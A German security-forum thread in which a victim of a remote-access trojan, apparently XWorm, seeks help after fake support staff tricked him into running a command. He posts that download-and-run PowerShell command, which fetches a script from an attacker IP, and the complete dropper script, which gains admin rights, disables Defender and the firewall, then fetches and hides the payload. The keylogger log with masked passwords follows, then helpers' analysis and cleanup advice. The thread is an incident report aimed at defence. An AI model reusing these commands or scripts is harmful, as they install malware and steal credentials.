Trojaner-Board - Rat Trojaner brauche Leute mit Erfahrung

Trojaner-Board (https://www.trojaner-board.de/)

- Diskussionsforum (https://www.trojaner-board.de/diskussionsforum/)

- - Rat Trojaner brauche Leute mit Erfahrung (https://www.trojaner-board.de/213083-rat-trojaner-brauche-leute-erfahrung.html)

Rat Trojaner brauche Leute mit Erfahrung

File: win12.exe
Checksum Trojaner File: 6f32596ebd4cb3ac5feb00f1b3f71ed03eb28db04df44d878c6531240b1f3171
Analyze Provider: virustotal,intezer

Hallo
Ich habe mir einen Rat Trojaner eingefangen. Danach habe ich einmal virustotal und intezer drauf losgelassen.
Ich habe auch schon verdächtige Dateien im temp Ordner gefunden ( genau die, die virustotal als dropped Files aufzeigt) . Irgendwann wo ich es gemerkt habe habe ich alles gekappt aber das temp Verzeichnis spricht schon eine deutliche Sprache.
Ich will also nicht wissen, ob ich einen Trojaner habe sondern wieviel schaden er schon angerichtet hat das beste wäre ein honeypot und jemand führt die Befehle aus die ich blöderweise eingegeben habe. Bin kir auch nicht sicher ob ich hier richtig bin , oder ich habe irgendwie die Möglichkeit auf meiner Kiste zu schauen welche Daten runtergeladen worden sind.

Bin mir auch nicht sicher ob ich hier richtig bin.

Beste Grüße

:hallo:

Vielen Dank für deine Anfrage.

Wir entfernen hier Malware.
Wenn du deinen Rechner säubern möchtest, bist du hier richtig.

Zitat:

(...) sondern wieviel schaden er schon angerichtet hat das beste wäre ein honeypot und jemand führt die Befehle aus die ich blöderweise eingegeben habe. Bin kir auch nicht sicher ob ich hier richtig bin , oder ich habe irgendwie die Möglichkeit auf meiner Kiste zu schauen welche Daten runtergeladen worden sind.

Welche Daten im Einzelnen ganz konkret bei dir durch die Kriminellen bereits abgegriffen worden sind, kann dir niemand mit 100% iger Sicherheit sagen.

Es gibt so viele verschiedene Malwarefamilien mit diversen Untergruppen, die alles Mögliche abgreifen, angefangen bei Zugangsdaten/Passwörter jeglicher Art über Miner bis hin zu CryptoStealern.

Research Teams von Sicherheitsfirmen wie Malwarebytes, Microsoft oder Kaspersky können mit Sicherheit sagen, welche Art von Daten diese oder jede Malware abzieht (wenn Sie ALLE dafür notwendigen schädlichen Elemente kennen), aber eine Bezifferung des tatsächlichen Schadens auf deinem System wird auch für die kaum möglich sein.

Das was du hier im Sinn hast, wird dir nicht gelingen.

Fazit
Die Malware muss runter vom System, so schnell wie möglich.
Alle Zugangsdaten und Passwörter sollten nach der Bereinigung bzw. nach der Neuinstallation zurückgesetzt bzw. geändert werden.

Nachtrag
Mindestens genau so wichtig ist, dass du weißt, wie die Malware auf dein System gekommen hast, damit so etwas nicht nochmal passiert.

Zitat:

Nachtrag
Mindestens genau so wichtig ist, dass du weißt, wie die Malware auf dein System gekommen hast, damit so etwas nicht nochmal passiert.

Das ist es ja, ich weiss ganz genau wie der Angriff passiert ist (leider hab ich auch relativ daemlich agiert).
Ich habe sogar soviel Infos das ich das 1:1 mit einem Honeypot wiederholen koennte, habe auch schon drueber nachgedacht mit einem Linux und eriner VM einen aufzusetzen.

Aber ich denke mir wuerde es schon reichen wie der Trojaner agiert also ob er zB. erst verschluesselt oder eher auf Stehlen von Daten spezialisert ist etc.
Aber du meintest ja das es sehr viele Unterarten gibt von Trojanern aber eigentlich dachte ich auch wenn dieseelbe Pruefsumme auftaucht das es exakt derselbe ist.

Beste gruesse

Zitat:

Zitat von moejoejoe (Beitrag 1787263)

Das ist es ja, ich weiss ganz genau wie der Angriff passiert ist (leider hab ich auch relativ daemlich agiert).

Woher genau weißt du denn das, was genau hast du gemacht? Warum beschreibst du das nicht? :wtf::confused:

Der Angreifer bekommt via Telegram eine Nachricht über die gelungene Attacke neben ein paar Eckdaten wie Betriebssystem etc..
Es liegt an ihm, wie er das RAT einsetzt.
XWorm ist mächtig.
Das kann man z.B. hierdurch
https://github[.]com/d00mt3l/XWorm-5.6/archive/refs/heads/main.zip
in weiten Teilen nachvollziehen.

Zitat:

Woher genau weißt du denn das, was genau hast du gemacht? Warum beschreibst du das nicht?

Jo denke das waere das beste folgende befehle habe ich in einer supportsession bloederweise mir abluchsen lassen und defender habe ich auch noch in windows abgeschaltet ( ich weiss wie daemlich das war bitte dafuer keine predigt):

HTML-Code:

Test: Powershell -Command "Invoke-Webrequest 'hxxp://172.245.20.209/win12.cmd' -OutFile troubleshoot.cmd" && troubleshoot.cmd

Hier der quell text der win12. Cmd:

Code:

@echo off
 

set payload_name=win12.exe

set zipname=win12.zip
 

set init_file=%temp%\batman.cmd
 

set zipurl=hxxp://172.245.20.209/win12.zip
 

set unzip="%temp%\unzi.vbs"

:-------------------------------------
 

>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
 

if '%errorlevel%' NEQ '0' (

    goto UACPrompt

) else ( goto gotAdmin)
 

:UACPrompt

    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"

    set params = %*:"="

    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
 

    "%temp%\getadmin.vbs"

    del "%temp%\getadmin.vbs"

    exit /B
 

:gotAdmin

    pushd "%CD%"

    CD /D "%~dp0"
 

:--------------------------------------
 

goto syscalls
 

:syscalls    

    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath %TEMP%

    powershell.exe -command "netsh advfirewall set allprofiles state off" >nul 2>&1

   
 

@REM get zip and run

Powershell -Command "Invoke-Webrequest 'www.google.nl' -OutFile %temp%\tmp.nl" 

IF %ERRORLEVEL% NEQ 0 (

    @REM No powershell "Invoke-Webrequest" 

    del "%temp%\tmp.nl"

    goto createDrops1

    exit /B

) else (

    @REM got powershell "Invoke-Webrequest" 

    del "%temp%\tmp.nl"

    goto createDrops2

    exit /B

)
 

:createDrops1

    if exist "%init_file%" del "%init_file%"

    if exist "%temp%\%zipname%" del "%temp%\%zipname%"

    if exist "%temp%\%payload_name%" del "%temp%\%payload_name%"

    @REM create unzip vbs script

    Call :UnZipCreate "%temp%" "%temp%\%zipname%"

    

    > %init_file% echo powershell -Command "(New-Object Net.WebClient).DownloadFile('%zipurl%', '%temp%/%zipname%')"

    @REM unzip file

    >> %init_file% echo cscript //nologo %unzip%

    @REM deletes the .vbs script

    >> %init_file% echo del %unzip%

    @REM run payload

    >> %init_file% echo start "" "%TEMP%\%payload_name%"
 

    >> %init_file% echo del "%TEMP%\%zipname%"

    >> %init_file% echo del %init_file%
 

    goto Run_hidden

    exit /B
 

:createDrops2 

    if exist "%init_file%" del "%init_file%"

    if exist "%temp%\%zipname%" del "%temp%\%zipname%"

    if exist "%temp%\%payload_name%" del "%temp%\%payload_name%"

    

    > %init_file% echo Powershell -Command "Invoke-Webrequest '%zipurl%' -OutFile %temp%\%zipname%"

    >> %init_file% echo Powershell -Command "Expand-Archive -Path %temp%\%zipname% -DestinationPath %temp% -FORCE"

    

    @REM run payload

    >> %init_file% echo start "" %TEMP%\%payload_name%

    

    @REM delete zip

    >> %init_file% echo del "%TEMP%\%zipname%"

    

    @REM delete the script

    >> %init_file% echo del %init_file%
 

    goto Run_hidden

    exit /B
 
 

:UnZipCreate <ExtractTo> <newzipfile>

    if exist %unzip% del /f /q %unzip%

    >%unzip%  echo Set fso = CreateObject("Scripting.FileSystemObject")

    >>%unzip% echo If NOT fso.FolderExists(%1) Then

    >>%unzip% echo fso.CreateFolder(%1)

    >>%unzip% echo End If

    >>%unzip% echo set objShell = CreateObject("Shell.Application")

    >>%unzip% echo set FilesInZip=objShell.NameSpace(%2).items

    >>%unzip% echo objShell.NameSpace(%1).CopyHere(FilesInZip)

    >>%unzip% echo Set fso = Nothing

    >>%unzip% echo Set objShell = Nothing

    exit /B
 
 

:Run_hidden

    set vbs_hide=%temp%\temprunner.vbs
 

    > %vbs_hide% echo Set oShell = CreateObject ("Wscript.Shell")

    >> %vbs_hide% echo Dim strArgs

    >> %vbs_hide% echo strArgs = "cmd /c %init_file%"

    >> %vbs_hide% echo oShell.Run strArgs, 0, false

    

    cscript /nologo %vbs_hide%

    del %vbs_hide% >nul 2>&1

    exit /B
 
 

echo Error: unable to run command. Command is not compatible with the current version.

(goto) 2>nul & del "%~f0"

Beste gruesse

Skriptbasierte Malware... bisschen cmd, vbs und ps.
Ähnliche Payloads habe ich schon öfter gesehen.
Ist sogar noch aktiv...

Guten Abend,
das ist nur das Vorgeplänkel.

Relevant: win12.exe->bound.exe->code injection, auf meiner Testkiste Edge.
Der Keylogger ist aktiviert.
Die Log.tmp befindet sich hier %TEMP%, wenn sie noch nicht gelöscht wurde.

Zitat:

Zitat von _698 (Beitrag 1787282)

das ist nur das Vorgeplänkel.

Glaub ich gerne.

Zitat:

Zitat von _698 (Beitrag 1787282)

Relevant: win12.exe->bound.exe->code injection, auf meiner Testkiste Edge.
Der Keylogger ist aktiviert.
Die Log.tmp befindet sich hier %TEMP%, wenn sie noch nicht gelöscht wurde.

Kannst du mit 100%iger Sicherheit sagen, welche Art von Daten abgegriffen werden?

Das ist ja das, was den TO interessiert.

Du sagtest ja:

Zitat:

Der Angreifer bekommt via Telegram eine Nachricht über die gelungene Attacke neben ein paar Eckdaten wie Betriebssystem etc..
Es liegt an ihm, wie er das RAT einsetzt.

Sagt ja alles.

Zitat:

Zitat von M-K-D-B (Beitrag 1787284)

Kannst du mit 100%iger Sicherheit sagen, welche Art von Daten abgegriffen werden?

Ja, ich kann das bei mir nachvollziehen.

Wichtig für den Hilfesuchenden wäre %TEMP%\Log.tmp.

Welche Funktionen des RATs der Angreifer im Einzelfall genau benutzt, weiß nur er.
Allein schon die Möglichkeit, weitere Malware zu installieren, bietet enormes Potenzial.

Zitat:

Wichtig für den Hilfesuchenden wäre %TEMP%\Log.tmp.

Die Datei ist tatsächlich noch vorhanden. Hier die Datei aber die Passwörter habe ich mit Platzhalter versehen.

Code:



###  (1) Discord | #ticket-0571 | Support Ticket — Tor Browser ###

i[SPACE]tried[SPACE]bv[Back][Back]both[SPACE]commands[SPACE]the[SPACE]new[SPACE]on[SPACE]e[Back][Back]e[SPACE]and[SPACE]the[SPACE]one[SPACE]before[Shift]:[SPACE][Shift][ENTER][CTRL][ENTER]oh[SPACE]ok[SPACE],[SPACE][Back][Back][SPACE][ENTER]
 

###  SearchApp ###

cmdcmd
 

###  (1) Discord | #ticket-0571 | Support Ticket — Tor Browser ###

cmd[SPACE]is[SPACE]reopend[Back]ed[ENTER]
 

###  • Discord | #��-hello | Boltz — Tor Browser ###

[Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]where[SPACE]i[SPACE]can[SPACE]find[SPACE]the[SPACE]memv[Back]er[Back][Back][SPACE]ber[Back][Back][Back][Back]bers[SPACE]list[SPACE][ENTER]
 

###  (1) Discord | #��-help | Boltz — Tor Browser ###

i[SPACE]have[SPACE]made[SPACE]an[SPACE]
 

###  • Discord | #��-help | Boltz — Tor Browser ###

support[SPACE]ticket[SPACE]0571kil[ENTER]but[SPACE]before[SPACE]i[SPACE]move[SPACE]on[SPACE]i[SPACE]wu[Back]ould[SPACE]like[SPACE]to[SPACE]know[SPACE]a[SPACE]littel[Back][Back]le[SPACE]bit[SPACE]more[SPACE]over[SPACE]thse[SPACE][Back][Back][Back]ese[SPACE]command[SPACE]which[SPACE]i[SPACE]a[Back]should[SPACE]execute[Shift]:[SPACE]
 

###  • Discord | #ticket-0571 | Support Ticket — Tor Browser ###

[CTRL]
 

###  • Discord | #��-help | Boltz — Tor Browser ###

[SPACE][CTRL][Shift][ENTER]what[SPACE]does[SPACE]these[SPACE]command[SPACE]do[SPACE][Shift]?[SPACE][ENTER]
 

###  • Discord | #ticket-0571 | Support Ticket — Tor Browser ###

sorry[SPACE]im[SPACE]little[SPACE]bit[SPACE][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][SPACE]need[SPACE]mite[Back][Back][Back][Back]more[SPACE]infos[SPACE]wa[Back]hatr[Back][SPACE]s[Back]does[SPACE]the[SPACE]cmd[SPACE]scripzt[Back][Back]z[Back]t[SPACE]do[SPACE][Shift]?[SPACE][ENTER]
 

###  • Discord | #��-help | Boltz — Tor Browser ###

fuck[SPACE][ENTER]
 

###  SearchApp ###

notpenotpe[Back][ENTER]
 

###  *C:\Users\moejoe\Documents\p.txt - Notepad++ ###

pasword1[Tab]pasword1[ENTER]
 

###  SearchApp ###

firewall[ENTER]
 

###  Windows-Sicherheit ###
 
 

###  Firefly ###

######ss[Back]112[Back][Back][Back]123456635241
 

###  Lokaler Datenträger (C:) ###

w
 

###  w - Lokaler Datenträger (C:) ###

i
 

###  wi - Lokaler Datenträger (C:) ###

n
 

###  explorer ###

[Shift]*
 

###  win* - Suchergebnisse in "Lokaler Datenträger (C:)" ###

.e
 

###  win*. - Suchergebnisse in "Lokaler Datenträger (C:)" ###

xe
 

###  SearchApp ###

recover
 

###  Windows Defender deaktivieren - so klappt's | heise online – Mozilla Firefox ###

recover[SPACE]windows[SPACE]10[SPACE][ENTER]
 

###  SearchApp ###

uac
 

###  explorer ###

[Back][Back][Back]bak[ENTER]
 

###  Mozilla Firefox ###

anakyse[SPACE][Back][Back][Back][Back][Back]lyse[SPACE]exe[SPACE]file[SPACE][ENTER]
 

###  SearchApp ###

blue[ENTER]recover<y[Back][Back][Back]ryviren[ENTER]notpe[Back][Back]e[ENTER]
 

###  *C:\Users\moejoe\Documents\p.txt - Notepad++ ###

pasword1[Tab]pasword1[ENTER]pasword1[Tab]pasword1[ENTER]pasword1[Tab]pasword1[ENTER]
 

###  Dieser PC ###

w
 

###  w - Dieser PC ###

i
 

###  wi - Dieser PC ###

n
 

###  win - Dieser PC ###

[Shift]*
 

###  explorer ###
 
 

###  SearchApp ###

dokum
 

###  Dokumente ###
 
 

###  *C:\Users\moejoe\Documents\p.txt - Notepad++ ###

pasword1[Tab]pasword1[ENTER]
 

###  SearchApp ###

blue
 

###  win*.exe - Suchergebnisse in "Dieser PC" ###
 
 

###  explorer ###
 
 

###  win*.exe - Suchergebnisse in "Dieser PC" ###
 
 

###  explorer ###
 
 

###  win*.exe - Suchergebnisse in "Dieser PC" ###
 
 

###  SearchApp ###

defenderofll[Back][Back][Back][Back][Back]offline[Back][Back][Back][Back][Back][Back][Back][SPACE]scan[SPACE]
 

###  SearchApp ###

reset[Back]
 

###  Banking4 ###

pasword1[ENTER]
 

###  SearchApp ###

bankin[ENTER][Shift]*.usb
 

###  Dieser PC ###

[Shift]*
 

###  * - Dieser PC ###

.
 

###  explorer ###

[Back][Back]
 

###  Dieser PC ###

w
 

###  w - Dieser PC ###

i
 

###  wi - Dieser PC ###

n
 

###  win - Dieser PC ###

[Shift]*
 

###  explorer ###

.
 

###  win+. - Suchergebnisse in "Dieser PC" ###

[Back]
 

###  win+ - Suchergebnisse in "Dieser PC" ###

[Back]
 

###  explorer ###

[ENTER]
 

###  Dokumente ###

[CTRL]
 

###  explorer ###

[CTRL]
 

###  Mein Datentresor - Suchergebnisse in "Dokumente" ###

[Shift]*
 

###  Mein Datentresor* - Suchergebnisse in "Dokumente" ###

.[Shift]*
 

###  win*.exe - Suchergebnisse in "Dieser PC" ###
 
 

###  Banking4 ###

[CTRL]
 

###  Dokumente ###

[CTRL][ENTER]
 

###  Wasabi Wallet ###

pasword1[ENTER]pasword1[ENTER]
 

###  Dokumente ###

wasabi[ENTER]w-walletbackup[ENTER]
 

###  SearchApp ###

sp
 

###  Open Wallet ###

[Shift]
 

###  Sparrow ###

[Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift]
 

###  Open Wallet ###
 
 

###  Sparrow ###

pasword1[ENTER]pasword1
 

###  Sparrow - multi_2 ###

pasword1[ENTER]#s
 

###  Sparrow - multi_electrum_2 ###

password1#
 

###  Sparrow - multi_elctrum ###

[ENTER]
 

###  Sparrow - sparrow_ledger_taproot ###

#pass1
 

###  Sparrow - multisig_wallet ###

g3#[ENTER]pasword1[ENTER]#s
 

###  Sparrow - sparrow_segwit ###

pass1#[ENTER]
 

###  SearchApp ###

rechner[ENTER]
 

###  Firefly ###

Pass3
 

###  LockApp ###

[ENTER]
 

###  Dokumente ###
 
 

###  explorer ###
 
 

###  Dokumente ###
 
 

###  explorer ###

[ENTER]
 

###  Dokumente ###
 
 

###  explorer ###
 
 

###  Dokumente ###
 
 

###  SearchApp ###

uac[ENTER]cmd
 

###  Eingabeaufforderung ###

cr[Back]ertutil[SPACE][ENTER]
 

###  Auswählen Eingabeaufforderung ###

e
 

###  Eingabeaufforderung ###

[Back]regedit[ENTER]
 

###  SearchApp ###

gpedit,ma[Back]sc[Back][Back][Back][Back]..[Back]sm[Back][Back]msc[ENTER]
 

###  Eingabeaufforderung ###

cd[SPACE]desktop[ENTER]certutil[SPACE]-has[Tab][Tab]hfile[SPACE][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Shift]win[Tab][SPACE][Shift]MD[SPACE]5[ENTER][Back][ENTER]
 

###  Auswählen Eingabeaufforderung ###

[CTRL]
 

###  Eingabeaufforderung ###

[Back][Back][Back][Shift]SHA256[ENTER]
 

###  Slack ###
 
 

###  neu 12 - Notepad++ ###

[CTRL]
 

###  *neu 12 - Notepad++ ###

[ENTER]
 

###  Auswählen Eingabeaufforderung ###

[CTRL]
 

###  *neu 12 - Notepad++ ###

[CTRL]c
 

###  notepad++ ###

hecks
 

###  *neu 12 - Notepad++ ###

ums[ENTER]
 

###  SearchApp ###

blue
 

###  Downloads ###

c
 

###  explorer ###

[Shift]:p
 

###  Downloads ###

rog[Back][Back][Back][Back]
 

###  explorer ###

[Back]prmir
 

###  Downloads ###

co[Back][Back][Back]
 

###  explorer ###

windstartpro
 

###  Downloads ###

sta[Back][Back][Back][ENTER][CTRL][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]
 

###  explorer ###

[Back]
 

###  Downloads ###

[Back][Back][Back][Back][Back][Back][Back]c
 

###  explorer ###

[Shift]:progmicwinhd
 

###  Downloads ###

ows[Back][Back][Back][Back][Back]
 

###  explorer ###

dowsspr
 

###  Eingabeaufforderung ###

cd[SPACE]progrm[Tab][Back][Back][Back]gam[Tab][Tab][Tab][Tab]data[ENTER]cd[SPACE][Shift]/program[Tab][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]cd[SPACE]..[ENTER]d[Back][Back]cd[SPACE][Shift]/[ENTER]#l[Back][Back][Back]cd[SPACE]progrm[Tab][Back]am[Tab][Tab][Tab][Tab][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]mirco[Back][Back][Back]cros[Tab]windows[SPACE]ß[Back][Back]str[Tab][Back]a[Tab]progr[Tab]st[Tab][Tab][Back][Tab][Back][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab]au[Tab][Tab][Tab][Back][Back]a[Back]a[Back][Tab][Tab][Tab][ENTER]dir[ENTER]
 

###  SearchApp ###

auto[Back][Back][Back][Back][Back]msconfig[ENTER]
 

###  Autostart ###

[CTRL]
 

###  win*.exe - Suchergebnisse in "Dieser PC" ###

docu
 

###  docu - Suchergebnisse in "Dieser PC" ###

[Back]
 

###  doc - Suchergebnisse in "Dieser PC" ###

ument
 

###  document - Suchergebnisse in "Dieser PC" ###

es
 

###  documentes - Suchergebnisse in "Dieser PC" ###

[Back]
 

###  documente - Suchergebnisse in "Dieser PC" ###

[Back]s.
 

###  documents. - Suchergebnisse in "Dieser PC" ###

t
 

###  documents.t - Suchergebnisse in "Dieser PC" ###

xt
 

###  Autostart ###

[Shift]%appd[Back]data[Shift]&[Back][Shift]%[ENTER]
 

###  Temp ###

r
 

###  r - Temp ###

e
 

###  re - Temp ###

s
 

###  res - Suchergebnisse in "Temp" ###

58
 

###  res5 - Suchergebnisse in "Temp" ###

c
 

###  res58c - Suchergebnisse in "Temp" ###

0
 

###  SearchApp ###

blue
 

###  documents.txt - Suchergebnisse in "Dieser PC" ###

[Back][Back][Back][Back]
 

###  docum.txt - Suchergebnisse in "Dieser PC" ###

[Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]
 

###  .txt - Suchergebnisse in "Dieser PC" ###

[Shift]*
 

###  Lokaler Datenträger (C:) ###

[Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift]%appdata[Shift]%[ENTER]
 

###  Temp ###

[Shift]*
 

###  * - Temp ###

.
 

###  explorer ###

t
 

###  *.t - Suchergebnisse in "Temp" ###

xt
 

###  CredentialUIBroker ###

pasword1[ENTER]
 

###  SearchApp ###

banking[ENTER]
 

###  Banking4 ###

pasword1pasword1[Shift]_4pw[Shift]_[Tab]pasword1[Back][Back][Back][Back][Back][Back][Back][Back]pasword1[Shift]pass2[Shift]_
 

###  UserAccountBroker ###

pasword1[Tab]pasword11[Tab]pasword11neu
 

###  Temp ###

[CTRL][CTRL]
 

###  LockApp ###

[ENTER]

Beste Grüsse

Na dann weißt du ja schon mal in etwa, welche Daten mit Sicherheit abgeflossen sind.
Nur welchen Nutzen hat dieses Wissen jetzt ganz konkret für dich?

Zitat:

Zitat von _698 (Beitrag 1787286)

Welche Funktionen des RATs der Angreifer im Einzelfall genau benutzt, weiß nur er.
Allein schon die Möglichkeit, weitere Malware zu installieren, bietet enormes Potenzial.

Das sehe ich auch so.

moejoejoe, du kannst also nicht ausschließen, dann noch weitere Daten abgegriffen wurden.
Damit ist eine Neuinstallation sowie das Ändern aller Passwörter meiner Meinung nach alternativlos.

Ich werde zwar nie verstehen, warum manche Menschen, sei es nun durch das Ausführen fragwürdiger Dateien oder Befehle oder durch der Verwendung illgaler Software, so fahrlässig mit ihren Daten umgehen. Aber damit habe ich mich abgefunden.

Dann hoffe ich für dich, moejoejoe, dass du was daraus gelernt hast und nicht wie so viele andere Nutzer beratungsresistent bist.

Alles Gute.

Ich hatte was vergessen ich habe ab dem Zeitpunkt meine Verbindung gekappt aber der keylogger ist noch mitgelaufen war genau 10 Min. dem RAT Angriff ausgesetzt. Insofern ist per Keylogger nichts weiter Rausgegangen.

Code:

###  SearchApp ###

notpenotpe[Back][ENTER]

Zitat:

Ich werde zwar nie verstehen, warum manche Menschen, sei es nun durch das Ausführen fragwürdiger Dateien oder Befehle oder durch der Verwendung illgaler Software, so fahrlässig mit ihren Daten umgehen. Aber damit habe ich mich abgefunden.

@M-K-DB
Dann hoffe ich für dich, moejoejoe, dass du was daraus gelernt hast und nicht wie so viele andere Nutzer beratungsresistent bist.

Ich werde jetzt nicht damit anfangen das es immer Momente gibt wo man unaufmerksam ist ( in 1000 anderen Faellen waere mir das nicht passiert ) evtl. auch aeusserliche Umstaende dazukommen die mit der reinen Sache nichts zu tun haben und wo man denkt es haette was passieren koennen sei es im Leben Strassenverkehr etc. und da kann es sein das man einen Fehler macht aber es passiert trotzdem nichts oder eben nicht, ok habe doch damit angefangen.
Falls du zu denen Menschen gehoerst denen das noch nie passiert ist dann glueckwunsch du bist dann einer von ganz wenigen. Dass das saudaemmlich von mir war das weiss ich selbst.

Ich danke fuer deine Hilfe und den Support.

B2T:

Gibt es eine Moeglichkeit im nachhinein irgendeinem Trace zu folgen das evtl das OS selbst setzt sodass man doch nachvollziehen kann was downgeloadet wurde.

Beste gruesse

Zitat:

moejoejoe, du kannst also nicht ausschließen, dann noch weitere Daten abgegriffen wurden.
Damit ist eine Neuinstallation sowie das Ändern aller Passwörter meiner Meinung nach alternativlos.

Hoffentlich befolgt er deinen Rat und macht die Neuinstallation. Dazu 2 Links für Windows 10 und Windows 11 von Deskmodder wie man eine Neuinstallation durchführen sollte. Nicht unwichtig ist, das man im Setup der gebooteten iso auswählt, das alle bisherigen Partitionen gelöscht werden:

Zitat:

Partition auswählen, löschen oder neu erstellen während der Installation
Windows 10 1809 neu installieren Tipps und Tricks Teil 1 006.jpg
Windows 10 1809 neu installieren Tipps und Tricks Teil 1 007.jpg

In diesem Fenster hat man nun die Auswahl direkt die alte Windows 10 Partition zu markieren und die neue Windows 10 zu installieren.
Windows 10 1809 neu installieren Tipps und Tricks Teil 1 008.jpg

Optional hat man hier aber die Möglichkeit:

Sämtliche Partitionen der Festplatte nacheinander zu markieren und zu löschen. Dabei muss jedes Mal der Sicherheitshinweis bestätigt werden, dass alle Daten gelöscht werden.
Ist das erledigt, erscheint Nicht zugewiesener Speicherplatz auf Laufwerk....
Jetzt kann man auf Weiter drücken und Windows richtet alle Partitionen selber ein. Oder

Windows 10 1809 neu installieren Tipps und Tricks Teil 1 009.jpg

Man klickt auf Neu -> Trägt nun die Größe der Partition ein, die man haben möchte für Windows 10 und bestätigt es mit Übernehmen.
Möchte man eine zweite Partition einrichten, markiert man wieder den nicht zugewiesenen Speicherplatz.
Optionaler Vorteil: Hat man die Festplatte schon vorab Partitioniert, wird der Bootbereich in C: integriert.

Quelle für Windows 10 Neuinstallation: https://www.deskmodder.de/wiki/index.php/windows_10_clean_neu_installieren

Und hier das Gleiche für Windows 11:

Zitat:

Windows 11 Alle Partitionen bei der Installation löschen

Windows 11 neu clean installieren Tipps und Tricks 006.jpg

Möchte man wirklich neu installieren, dann wählt man die benutzerdefinierte Installation aus.
Mit der Funktion Upgrade, werden die vorhandenen Dateien in den Ordner Windows.old geschoben.

Windows 11 24H2 clean neu installieren Teil 1 007.jpg
Windows 11 neu clean installieren Tipps und Tricks 007.jpg

Windows 11 neu clean installieren Tipps und Tricks 008.jpg
Windows 11 neu clean installieren Tipps und Tricks 009.jpg

Hat man die benutzerdefinierte Installation ausgewählt, kann man hier die Windows Partition markieren und installieren.

Möchte man wirklich einmal komplett neu installieren, löscht man alle Partitionen, bis nur noch "Nicht zugewiesener Speicherplatz" als Auswahl zur Verfügung steht.
Wählt man diesen Bereich aus, richtet Windows 11 nun die Partitionen selbst ein.

Quelle: https://www.deskmodder.de/wiki/index.php?title=Windows_11_neu_clean_installieren_Tipps_und_Tricks
Und wenn er die Windows Neuinstallation hat und alles fertig ist, ein Backup/Image Programm installieren und damit eine Sicherung vom Windows auf eine externe USB Festplatte machen.

Jungs ich will hier keinen Streit ich hätte auch am liebsten meinen persönlichen. Wieder gelöscht das könnte. Ich aber im Nachhinein nicht mehr, da es hier nix zu suchen hat. Insofern war es nur meine pers. IMHO

Zitat:

Das werde ich tun sobald ich alle Möglichkeiten ausgeschöpft habe solange ist der PC ein cold storage mit evtl wichtigen Möglichkeiten Infos rauszuziehen, zB. Welche dateien downgeloadet wurden.
Ich bin mir bewusst das selbst damit ein Restrisiko besteht, ich muss aber abwägen ( gerne auch aufgrund von mehr Spezialisten knowhow) was mir wichtig ist.

@_698:
Wenn ich das richtig verstehe, hast du ein kl Testsystem aufgesetzt, waere es theoretisch möglich ein hidden os in den 10 min zu hinterlegen sodass es egal wäre ob ich das komplette Netzwerk deaktiviere ?.
Beste Grüsse